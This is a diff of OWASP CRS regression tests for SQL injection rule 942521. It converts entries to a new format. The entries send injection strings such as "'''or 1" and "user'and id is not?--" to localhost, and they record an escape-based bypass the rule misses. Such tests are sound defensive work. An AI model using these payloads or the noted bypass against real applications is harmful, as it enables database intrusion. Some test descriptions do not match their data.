"942521" - - test_title: 942521-5 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=user'and%20id%20is%20not?--" + version: HTTP/1.0 + output: + log: + expect_ids: [942521] + - test_id: 5 desc: "False-positve: is it your parents' or yours" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=it%20is%20your%20parents'%20and%20yours" - version: HTTP/1.0 - output: - log_contains: id "942521" - - test_title: 942521-6 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + 
User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=it%20is%20your%20parents'%20and%20yours" + version: HTTP/1.0 + output: + log: + expect_ids: [942521] + - test_id: 6 desc: "Negative test: bob's or alice's" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=bob's%20or%20alice's" - version: HTTP/1.0 - output: - no_log_contains: id "942521" - - test_title: 942521-7 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=bob's%20or%20alice's" + version: HTTP/1.0 + output: + log: + no_expect_ids: [942521] + - test_id: 7 desc: "Negative test: mother or daugher" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=mother%20or%20daughter" - version: HTTP/1.0 - output: - no_log_contains: id "942521" - - test_title: 942521-8 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=mother%20or%20daughter" + version: HTTP/1.0 + output: + log: + no_expect_ids: [942521] + - test_id: 8 desc: "Negative test: 'oreo" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - 
Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var='oreo" - version: HTTP/1.0 - output: - no_log_contains: id "942521" - - test_title: 942521-9 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var='oreo" + version: HTTP/1.0 + output: + log: + no_expect_ids: [942521] + - test_id: 9 desc: "Negative test: 'fork" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var='fork" - version: HTTP/1.0 - output: - no_log_contains: id "942521" - - test_title: 942521-10 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var='fork" + version: HTTP/1.0 + output: + log: + no_expect_ids: [942521] + - test_id: 10 desc: "Negative test: 'for" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var='%20for" - version: HTTP/1.0 - output: - no_log_contains: id "942521" - - test_title: 942521-11 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var='%20for" + version: HTTP/1.0 + output: + log: + no_expect_ids: [942521] + - test_id: 11 desc: "Negative test: ''or" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=''or" - version: HTTP/1.0 - output: - no_log_contains: id "942521" - - test_title: 942521-12 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=''or" + version: HTTP/1.0 + output: + log: + no_expect_ids: [942521] + - test_id: 12 desc: "Negative test: 'books' or 'applles'" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=''or" - version: HTTP/1.0 - output: - no_log_contains: id "942521" - - test_title: 942521-13 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=''or" + version: HTTP/1.0 + output: + log: + no_expect_ids: [942521] + - test_id: 13 desc: "Negative test: bob's presentation's 'or'" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=''or" - version: HTTP/1.0 - output: - no_log_contains: id "942521" - - test_title: 942521-14 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=''or" + version: HTTP/1.0 + output: + log: + no_expect_ids: [942521] + - test_id: 14 desc: "Bypass with '''or 1" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var='''or%201" - version: HTTP/1.0 - output: - log_contains: id "942521" - - test_title: 942521-15 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var='''or%201" + version: HTTP/1.0 + output: + log: + expect_ids: [942521] + - test_id: 15 desc: "False-negative: Not detected with escapes" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=%5C'lol'%20or%20'1" - version: HTTP/1.0 - output: - no_log_contains: id "942521" - - test_title: 942521-16 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 
+ method: POST + port: 80 + uri: "/post" + data: "var=%5C'lol'%20or%20'1" + version: HTTP/1.0 + output: + log: + no_expect_ids: [942521] + - test_id: 16 desc: "Negative test: Wikipedia article about SQLi" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=Incorrectly%20constructed%20SQL%20statements%0AThis%20form%20of%20injection%20relies%20on%20the%20fact%20that%20SQL%20statements%20consist%20of%20both%20data%20used%20by%20the%20SQL%20statement%20and%20commands%20that%20control%20how%20the%20SQL%20statement%20is%20executed.%20For%20example%2C%20in%20the%20SQL%20statement%20select%20*%20from%20person%20where%20name%20%3D%20'susan'%20and%20age%20%3D%202%20the%20string%20'susan'%20is%20data%20and%20the%20fragment%20and%20age%20%3D%202%20is%20an%20example%20of%20a%20command%20(the%20value%202%20is%20also%20data%20in%20this%20example).%0A%0ASQL%20injection%20occurs%20when%20specially%20crafted%20user%20input%20is%20processed%20by%20the%20receiving%20program%20in%20a%20way%20that%20allows%20the%20input%20to%20exit%20a%20data%20context%20and%20enter%20a%20command%20context.%20This%20allows%20the%20attacker%20to%20alter%20the%20structure%20of%20the%20SQL%20statement%20which%20is%20executed.%0A%0AAs%20a%20simple%20example%2C%20imagine%20that%20the%20data%20'susan'%20in%20the%20above%20statement%20was%20provided%20by%20user%20input.%20The%20user%20entered%20the%20string%20'susan'%20(without%20the%20apostrophes)%20in%20a%20web%20form%20text%20entry%20field%2C%20and%20the%20program%20used%20string%20concatenation%20statements%20to%20form%20the%20above%20SQL%20statement%20from%20the%20three%20fragments%20select%20*%20from%20person%20where%20name%3D'%2C%20the%20user%20input%20of%20'susan'%2C%20and%20'%20and%20age%20%3D%202.%0A%0ANow%20imagine%20that%20i
nstead%20of%20entering%20'susan'%20the%20attacker%20entered%20'%20or%201%3D1%3B%20--.%0A%0AThe%20program%20will%20use%20the%20same%20string%20concatenation%20approach%20with%20the%203%20fragments%20of%20select%20*%20from%20person%20where%20name%3D'%2C%20the%20user%20input%20of%20'%20or%201%3D1%3B%20--%2C%20and%20'%20and%20age%20%3D%202%20and%20construct%20the%20statement%20select%20*%20from%20person%20where%20name%3D''%20or%201%3D1%3B%20--%20and%20age%20%3D%202.%20Many%20databases%20will%20ignore%20the%20text%20after%20the%20'--'%20string%20as%20this%20denotes%20a%20comment.%20The%20structure%20of%20the%20SQL%20command%20is%20now%20select%20*%20from%20person%20where%20name%3D''%20or%201%3D1%3B%20and%20this%20will%20select%20all%20person%20rows%20rather%20than%20just%20those%20named%20'susan'%20whose%20age%20is%202.%20The%20attacker%20has%20managed%20to%20craft%20a%20data%20string%20which%20exits%20the%20data%20context%20and%20entered%20a%20command%20context.%0A%0AA%20more%20complex%20example%20is%20now%20presented.%0A%0AImagine%20a%20program%20creates%20a%20SQL%20statement%20using%20the%20following%20string%20assignment%20command%20%3A%0A%0Avar%20statement%20%3D%20%22SELECT%20*%20FROM%20users%20WHERE%20name%20%3D%20'%22%20%2B%20userName%20%2B%20%22'%22%3B%0A%0AThis%20SQL%20code%20is%20designed%20to%20pull%20up%20the%20records%20of%20the%20specified%20username%20from%20its%20table%20of%20users.%20However%2C%20if%20the%20%22userName%22%20variable%20is%20crafted%20in%20a%20specific%20way%20by%20a%20malicious%20user%2C%20the%20SQL%20statement%20may%20do%20more%20than%20the%20code%20author%20intended.%20For%20example%2C%20setting%20the%20%22userName%22%20variable%20as%3A%0A%0A'%20OR%20'1'%3D'1%0Aor%20using%20comments%20to%20even%20block%20the%20rest%20of%20the%20query%20(there%20are%20three%20types%20of%20SQL%20comments%5B14%5D).%20All%20three%20lines%20have%20a%20space%20at%20the%20end%3A%0A%0A'%20OR%20'1'%3D'1'%20--%0A'%20OR%20'1'%3D'1'%20%7B%0A'%20OR%20'1'%3D'1'%20%2F
*%20" - version: HTTP/1.0 - output: - no_log_contains: id "942521" - - test_title: 942521-17 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=Incorrectly%20constructed%20SQL%20statements%0AThis%20form%20of%20injection%20relies%20on%20the%20fact%20that%20SQL%20statements%20consist%20of%20both%20data%20used%20by%20the%20SQL%20statement%20and%20commands%20that%20control%20how%20the%20SQL%20statement%20is%20executed.%20For%20example%2C%20in%20the%20SQL%20statement%20select%20*%20from%20person%20where%20name%20%3D%20'susan'%20and%20age%20%3D%202%20the%20string%20'susan'%20is%20data%20and%20the%20fragment%20and%20age%20%3D%202%20is%20an%20example%20of%20a%20command%20(the%20value%202%20is%20also%20data%20in%20this%20example).%0A%0ASQL%20injection%20occurs%20when%20specially%20crafted%20user%20input%20is%20processed%20by%20the%20receiving%20program%20in%20a%20way%20that%20allows%20the%20input%20to%20exit%20a%20data%20context%20and%20enter%20a%20command%20context.%20This%20allows%20the%20attacker%20to%20alter%20the%20structure%20of%20the%20SQL%20statement%20which%20is%20executed.%0A%0AAs%20a%20simple%20example%2C%20imagine%20that%20the%20data%20'susan'%20in%20the%20above%20statement%20was%20provided%20by%20user%20input.%20The%20user%20entered%20the%20string%20'susan'%20(without%20the%20apostrophes)%20in%20a%20web%20form%20text%20entry%20field%2C%20and%20the%20program%20used%20string%20concatenation%20statements%20to%20form%20the%20above%20SQL%20statement%20from%20the%20three%20fragments%20select%20*%20from%20person%20where%20name%3D'%2C%20the%20user%20input%20of%20'susan'%2C%20and%20'%20and%20age%20%3D%202.%0A%0ANow%20imagine%20that%20instead%20of%20entering%20'susan'%20the%20attacker%20entered%20'%20or%201%3D1%3B%20--.%0A%0AThe%20program%20will%20use%20the%20sam
e%20string%20concatenation%20approach%20with%20the%203%20fragments%20of%20select%20*%20from%20person%20where%20name%3D'%2C%20the%20user%20input%20of%20'%20or%201%3D1%3B%20--%2C%20and%20'%20and%20age%20%3D%202%20and%20construct%20the%20statement%20select%20*%20from%20person%20where%20name%3D''%20or%201%3D1%3B%20--%20and%20age%20%3D%202.%20Many%20databases%20will%20ignore%20the%20text%20after%20the%20'--'%20string%20as%20this%20denotes%20a%20comment.%20The%20structure%20of%20the%20SQL%20command%20is%20now%20select%20*%20from%20person%20where%20name%3D''%20or%201%3D1%3B%20and%20this%20will%20select%20all%20person%20rows%20rather%20than%20just%20those%20named%20'susan'%20whose%20age%20is%202.%20The%20attacker%20has%20managed%20to%20craft%20a%20data%20string%20which%20exits%20the%20data%20context%20and%20entered%20a%20command%20context.%0A%0AA%20more%20complex%20example%20is%20now%20presented.%0A%0AImagine%20a%20program%20creates%20a%20SQL%20statement%20using%20the%20following%20string%20assignment%20command%20%3A%0A%0Avar%20statement%20%3D%20%22SELECT%20*%20FROM%20users%20WHERE%20name%20%3D%20'%22%20%2B%20userName%20%2B%20%22'%22%3B%0A%0AThis%20SQL%20code%20is%20designed%20to%20pull%20up%20the%20records%20of%20the%20specified%20username%20from%20its%20table%20of%20users.%20However%2C%20if%20the%20%22userName%22%20variable%20is%20crafted%20in%20a%20specific%20way%20by%20a%20malicious%20user%2C%20the%20SQL%20statement%20may%20do%20more%20than%20the%20code%20author%20intended.%20For%20example%2C%20setting%20the%20%22userName%22%20variable%20as%3A%0A%0A'%20OR%20'1'%3D'1%0Aor%20using%20comments%20to%20even%20block%20the%20rest%20of%20the%20query%20(there%20are%20three%20types%20of%20SQL%20comments%5B14%5D).%20All%20three%20lines%20have%20a%20space%20at%20the%20end%3A%0A%0A'%20OR%20'1'%3D'1'%20--%0A'%20OR%20'1'%3D'1'%20%7B%0A'%20OR%20'1'%3D'1'%20%2F*%20" + version: HTTP/1.0 + output: + log: + no_expect_ids: [942521] + - test_id: 17 desc: "Performance test" stages: - - stage: 
- input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=%21%21%21%21%21%27...%22%21%21%27.%22.%60...%27.....%27%40%60%21%21%21%21%21%60....%22%40%40%40%40%40%60%21%21%21%21%21%27%40%60%40%40%40%40%40%27...%22%27%40%40%40%40%40%27%22...%27%21%21%21%60%21%21%60%40%40%22%27%40%40%60..%27%21%21%27%40%40%40%40%22%40%40%40%40%40%60%21%21%21%21%27%21%22%40%40%40%40%40%27%21%21%21%60%21%21%21%21%22%21%21%21%22%21%21%21%21%21%27....%27%27%40%27%22.%60%40%40%40%40%60%27%21%21%22%40%60%40%40%40%40%27%21%27%21%27.....%27%21%21%21%60%40%40%40%60.%27%21%21%60%21%27%21%21%21%60%21%21%21%21%21%60%22%40%60%40%40%40%60%21%21%21%27%40%60%40%40%40%40%22...%22%21%21%21%21%21%27%40%40%40%27%21%27.....%27%21%21%21%27....%60%40%40%40%60%40%22...%60...%27%40%40%40%40%40%60...%22%40%40%40%40%22..%22%40%40%40%60%60%21%22%40%40%40%22%40%40%40%22%40%40%40%22..%22%27....%60%21%21%27%40%22...%27%40%40%40%40%22%40%40%40%22%21%21%21%21%21%27...%60...%22%21%21%21%21%60%40%40%40%27%21%27%40%40%40%40%40%22%40%40%40%60.....%22....%22%27....%22%22%21%21%21%21%22%40%40%27%21%21%21%21%21%22....%27%21%21%21%21%21%22%21%21%21%60%40%40%40%40%22%40%22%40%40%40%27%40%40%40%40%40%22%21%21%21%21%21%22%60%21%21%21%21%22%40%40%40%40%27%60%60%60..%22...%22%21%21%21%27%21%60%22%40%40%40%60%21%21%21%60%22%40%40%40%40%27%27%60%40%40%40%40%22.....%27%27..%22%40%40%40%22%21%21%21%21%60%40%40%40%40%40%27%21%21%21%21%22.%60%40%40%40%40%40%60%60%21%21%60%21%21%21%21%22%21%21%22.%60%27%40%40%27%40%40%40%60%21%21%21%21%21%22%21%21%21%21%21%27%40%40%40%40%27%21%21%21%21%21%60%40%40%40%40%40%22.....%60%60.%22%40%40%22.%27%21%21%21%21%21%27%21%21%27%40%40%40%22%60.....%60%40%40%27%22%40%40%40%40%60%27%22%40%40%40%40%60%21%21%21%21%27%22%21%21%21%21%60%21%60%40%40%40%40%22%40%40%40%40%22%21%21%22%21%21%21%21%21%27%40%40%22...%
60%22%27.%60%22%40%22%40%40%40%40%40%22%21%21%22%21%21%21%21%22%40%40%40%60%40%40%27%21%21%22.....%60%21%21%21%60%40%40%22%40%60%40%40%40%60%27....%27%40%40%40%22%60%40%40%40%40%40%60%60%21%21%22%40%22..%27%21%21%21%21%21%60%40%40%40%40%27....%22.....%27%60%21%21%21%27%21%22%40%60%60%27%60%27%40%27%40%40%40%40%27%21%21%27%40%40%60%21%22%60%21%21%21%27..%22%27%40%40%40%60%60.....%27.....%27%40%40%22%22%27.....%22.%60%21%60%40%40%60%21%60%40%40%40%40%27%40%40%40%27%22..%60%21%60%40%40%40%60%60%40%40%40%40%22%21%21%21%21%21%22.%60%21%21%27%60%40%40%40%40%60%40%40%40%40%40%27%22.%22...%27...%27.....%27%40%40%40%40%40%60.%27%40%40%40%27%21%21%21%21%21%22%40%22%40%60%27%21%21%21%27%40%27%40%40%40%40%60%40%40%40%40%60%27%40%40%40%40%40%60%21%21%21%60%40%40%22...%60..%27.....%27.%27%27%21%60.%22%22%21%21%21%27.....%22%40%40%40%22%40%40%40%40%40%60...%27.%60%22..%27%21%60%21%21%21%21%60..%60....%22%27%40%40%40%40%22..%27.%27....%27%40%40%60...%22%21%22%22%21%60%21%21%21%21%21%27%21%21%27%22%27....%27%22%21%21%21%27%40%40%40%27.....%22...%60..%60%40%40%40%40%40%60%22%40%40%60.%27%21%27%21%21%21%21%21%27....%60%21%21%21%27%21%27%40%60%60...%22%21%21%21%21%60%27%40%22%22%40%22...%60%40%40%27..%22%21%21%21%21%60..%27%40%40%27%40%40%27..%22%40%40%40%40%60....%60%40%40%40%60%40%40%40%40%60%22%21%21%21%60%21%60%40%40%40%22..%27%40%40%40%60%40%40%60%60%22%40%40%40%40%22%21%21%60%40%40%22%40%60%21%21%60%27.....%27%40%40%40%40%40%22.%60%21%21%21%21%60%21%21%60.....%22%21%21%27%27%21%22%40%40%40%27%27%22%40%40%40%40%60....%60%22.%27%21%21%21%27%40%40%40%40%60...%27..%60%21%21%60...%60%21%60%40%40%27.....%27%40%40%27%27%40%40%27..%27.%27%40%22%27%21%22%40%40%22%21%21%21%27%60.....%60.....%22.%60%40%60%40%40%40%60..%22.....%60%40%40%40%40%22%27%21%21%21%21%21%60%40%40%40%40%22%40%40%40%40%40%27....%60.%27....%27%21%21%21%60%21%21%21%21%21%60..%27.%27%40%40%22%60%40%40%40%60.....%27...%27%21%21%21%21%60..%60....%60%40%40%40%27%21%21%21%27%60%21%21%21%21%27...%60%40%40%40%60....%60%27%40%4
0%40%40%27%40%40%60..%27%40%40%27..%27%22%21%22%40%40%40%27...%22%21%21%21%21%21%60%40%40%40%40%40%22%40%40%40%40%22%60%21%27..%60%21%21%21%27%40%40%40%22%21%21%21%21%27%40%40%40%40%22%40%60%22.....%22.....%27%40%40%40%40%40%27%21%21%21%21%27%40%27%40%40%40%40%40%27%60%27%22%21%22%21%21%21%21%60%40%40%40%40%40%27..%22.%60%40%40%40%40%40%22.%60%60%21%21%21%21%21%60%21%21%21%22...%60%40%22%21%21%21%21%22%21%21%60%40%40%40%40%60%21%21%21%21%22%40%27%21%21%21%60%27%40%40%40%40%22.....%60....%22...%60%21%21%21%21%60%21%21%21%21%21%27%40%40%60%40%40%40%40%27%40%60%21%22.....%22%21%21%21%27%40%40%40%40%27....%22%40%40%40%40%40%60%40%27.....%22%21%21%21%60%40%40%60%21%21%21%21%21%22%60%40%40%40%40%27%21%21%21%22...%60%40%60...%27...%60%21%21%21%22%21%21%21%21%27%21%27%21%21%60.%60%21%21%60..%22..%60.....%22..%22....%27%21%21%21%21%27%60%40%40%40%40%40%22%21%21%21%21%22%40%40%40%40%40%27%40%40%40%40%40%60.%60....%60%60%40%40%40%40%22%27%40%27%40%60%21%21%21%21%21%27...%27%40%40%40%40%40%27.%27.....%60%21%21%60%21%21%21%21%21%22%22%40%40%40%27%40%60%21%21%21%22%21%21%21%21%21%27..%22....%27%21%21%21%21%21%27...%60.....%60%40%22%21%21%21%21%27%27%21%21%21%21%21%22%60%27%21%21%21%27..%60%40%60%21%21%21%21%21%27%60%27%21%21%27%21%21%21%60%21%21%21%21%27%40%60%22%21%60.....%27%40%40%40%40%40%27.....%60%21%21%60%40%40%40%27...%60%21%21%21%60%40%40%40%22%22%21%21%21%21%21%22%40%40%40%40%27%40%22.%22.%22%40%40%40%40%40%22%40%60....%60....%27%21%21%21%21%21%22%21%21%21%21%60%21%21%21%21%21%27....%27%21%21%21%21%60%22%60%40%40%40%40%40%60...%22%40%60%40%40%22%40%40%40%40%40%27%21%21%27%22%40%40%60%27%22%40%40%40%22%21%60%27%21%21%21%21%21%60...%27%40%40%22%21%21%21%27%21%27%21%21%21%60%21%21%21%21%21%60%22.....%22%21%21%21%21%27%40%40%40%40%60%21%21%27.....%22%21%21%21%22%21%21%22%21%21%22%40%40%27%21%21%21%21%22%40%40%40%40%27%40%40%40%40%27....%60%40%40%40%60%40%22...%27.....%27%40%40%22%40%40%40%22%21%21%21%21%21%22...%27..%22%21%22%40%40%40%40%40%27....%60%40%40%40%40%22%27%21%21%
21%21%21%60%40%40%22%27%40%40%40%40%40%60%21%21%21%27%40%40%40%27%60.%27%21%21%21%22....%60%40%27.....%22%40%40%40%40%40%27%40%60%40%40%40%40%60%40%40%40%60%21%21%21%21%21%60%27%21%21%21%27....%22%22%21%21%27...%27%21%21%21%27...%27%40%22....%22%40%40%27%21%21%21%21%27.....%22%40%40%40%40%27%22....%22...%27%21%21%21%60....%22%40%40%40%22...%27%40%27..%60%21%21%27%40%40%40%40%40%60%40%60%21%21%21%21%21%27.....%60%27%22%22%27%27.%22%60%21%21%22%40%40%60%21%22%60%21%21%27..%60%21%21%21%21%60%21%21%21%21%21%60%40%40%22%21%21%21%21%21%60%40%40%60....%60%40%40%40%40%40%22%40%40%40%40%60.....%60%27%27...%27%22%22%40%40%60.....%22%22%27%40%60%27%27.....%22%40%27%60.....%60%40%22%40%40%40%40%27%21%21%21%21%60%40%40%40%27%40%40%40%40%40%22%21%21%21%21%60.%22%21%21%27%40%27%22%21%21%21%21%60%40%40%27%40%40%40%40%27%21%21%27%27..%27%27%21%21%21%21%21%27%40%27.%60%21%21%21%21%21%27%40%40%40%40%27%21%21%27%40%40%40%40%22...%22%60%27%40%40%40%22%40%40%40%22%22%21%21%21%22%21%21%60...%27.....%60%40%40%40%60%21%21%21%60%40%40%40%40%40%22%22%21%21%21%60%21%21%21%21%21%27%27%21%21%21%21%22....%27%21%21%21%21%21%27%21%21%21%22%21%21%21%21%21%27%22....%60%27%40%40%27%21%27.....%22%21%22%21%21%21%21%21%22%21%21%21%21%22...%27%22%40%40%40%60%40%40%40%40%40%27%27%21%21%27....%22.....%22%21%21%21%22%40%40%40%40%40%27%21%21%21%21%60%22.....%60..%60%22%21%21%21%22%22%27...%27%40%40%40%40%27.....%27%21%21%21%60...%27.%22%21%21%21%21%21%27%21%27%21%21%21%22%40%27.....%27%21%21%21%21%22%40%27...%27%21%21%27%40%40%22%40%40%40%40%40%60..%27%21%27.....%22%22%21%21%21%21%21%27%40%40%40%40%22%40%40%40%60.....%60%21%21%21%21%21%27....%27%27%40%40%40%40%27.....%27%21%60....%22...%22%21%21%21%21%27%21%21%22%40%27%40%40%40%40%40%27%21%21%21%22%21%21%21%21%27%21%21%21%21%60%27%27..%22%22%21%21%21%27%22%21%60..%22%27%27%60..%22%21%22%21%21%21%21%21%27..%27..%27.%27%27%21%21%21%21%60%27%21%21%21%21%60..%27%21%21%22.....%22%21%21%21%21%27%21%21%21%27....%60.....%22...%22%22%22.%22%27.%60%21%21%21%21%22%60%40
%22.....%27%21%21%21%21%22%40%60...%22.%22.....%27%27..%22%27%21%21%21%21%21%60....%22%21%21%21%22..%60%21%21%21%21%60%21%21%21%21%27....%60%27%40%40%40%22%27.%27....%22%40%40%40%60%21%21%21%21%22%40%40%40%40%40%27%21%21%21%60%40%40%40%40%60.%22..%22%40%40%22%21%60%22%21%21%21%21%27%27%27.%27%22%40%40%40%22%40%40%40%27....%22%21%21%21%21%21%22%21%21%21%21%22%21%27%60%27%21%21%21%60%21%27...%60%21%21%21%21%27...%27%40%40%40%40%40%60%21%21%60%21%21%21%22%40%60%40%40%40%40%40%60%27%60..%22%22%21%21%27%22%40%40%27...%22..%22....%22%27%60%40%40%27....%27%40%40%40%40%22%60%21%21%60.%60%40%27%21%60%21%22...%27...%27.....%27%21%21%22..%22%22%40%27%21%21%21%27%40%40%22.%27%21%21%21%60%40%60%60%21%21%21%60%21%21%22...%27.%22%21%21%21%27...%22%21%21%21%21%60%40%40%40%40%60%22.%27%21%21%60.....%60%21%21%60%21%21%21%21%21%27.%27%40%40%40%40%40%22%21%21%21%60..%27%21%21%21%21%21%27%21%21%60%40%40%27%21%21%21%27.%22%21%21%21%21%22.%22%40%40%40%40%40%22%21%21%21%22%21%21%22%22%21%21%21%60%27%21%21%60%40%40%40%40%40%27..%27%40%60.....%22%21%21%21%27.%27%21%21%21%21%27%27....%22%40%40%27%40%40%40%40%40%60%60or" - version: HTTP/1.0 - output: - log_contains: id "942521" - - test_title: 942521-18 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: 
"var=%21%21%21%21%21%27...%22%21%21%27.%22.%60...%27.....%27%40%60%21%21%21%21%21%60....%22%40%40%40%40%40%60%21%21%21%21%21%27%40%60%40%40%40%40%40%27...%22%27%40%40%40%40%40%27%22...%27%21%21%21%60%21%21%60%40%40%22%27%40%40%60..%27%21%21%27%40%40%40%40%22%40%40%40%40%40%60%21%21%21%21%27%21%22%40%40%40%40%40%27%21%21%21%60%21%21%21%21%22%21%21%21%22%21%21%21%21%21%27....%27%27%40%27%22.%60%40%40%40%40%60%27%21%21%22%40%60%40%40%40%40%27%21%27%21%27.....%27%21%21%21%60%40%40%40%60.%27%21%21%60%21%27%21%21%21%60%21%21%21%21%21%60%22%40%60%40%40%40%60%21%21%21%27%40%60%40%40%40%40%22...%22%21%21%21%21%21%27%40%40%40%27%21%27.....%27%21%21%21%27....%60%40%40%40%60%40%22...%60...%27%40%40%40%40%40%60...%22%40%40%40%40%22..%22%40%40%40%60%60%21%22%40%40%40%22%40%40%40%22%40%40%40%22..%22%27....%60%21%21%27%40%22...%27%40%40%40%40%22%40%40%40%22%21%21%21%21%21%27...%60...%22%21%21%21%21%60%40%40%40%27%21%27